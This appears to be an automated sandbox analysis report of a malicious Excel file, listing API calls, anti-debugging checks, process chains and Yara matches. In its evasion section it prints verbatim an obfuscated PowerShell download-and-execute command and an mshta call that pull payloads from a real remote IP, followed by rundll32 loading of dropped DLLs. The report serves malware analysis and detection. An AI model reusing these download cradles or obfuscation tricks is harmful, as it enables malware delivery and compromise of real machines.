Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 00000011.00000002.593978093.00000000003AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_01F84087 mov eax, dword ptr fs:[00000030h] 9_2_01F84087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007C4087 mov eax, dword ptr fs:[00000030h] 10_2_007C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00824087 mov eax, dword ptr fs:[00000030h] 11_2_00824087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B4087 mov eax, dword ptr fs:[00000030h] 12_2_001B4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00704087 mov eax, dword ptr fs:[00000030h] 13_2_00704087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00234087 mov eax, dword ptr fs:[00000030h] 14_2_00234087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00244087 mov eax, dword ptr fs:[00000030h] 16_2_00244087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",eCIlnBbopQsHZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DTzZcwBzvukLX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",XhTgIPP Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",zykxfMjqzK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",DllRegisterServer Jump to behavior
Source: Yara match File source: check.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\check.xls, type: DROPPED

Language, Device and Operating System Detection

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

barindex
Source: Yara match File source: 12.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2840000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.5c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.a50000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.440000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.30e0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2f10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2f90000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.23d0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2920000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.7e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.960000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d10000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.5c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2680000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.23d0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ab0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.ab0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.a10000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2770000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2850000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3130000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1f70000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3080000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.bf0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3030000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2840000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.9c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2770000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2850000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.470000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.23d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.890000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.880000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2c60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2460000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2f90000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d10000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d90000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.25a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.26e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.8e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2750000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.880000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2750000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2b30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.a90000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.360000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3080000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.930000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.9c0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.930000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.810000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.23d0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2530000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2b30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.9c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2680000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.660050633.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
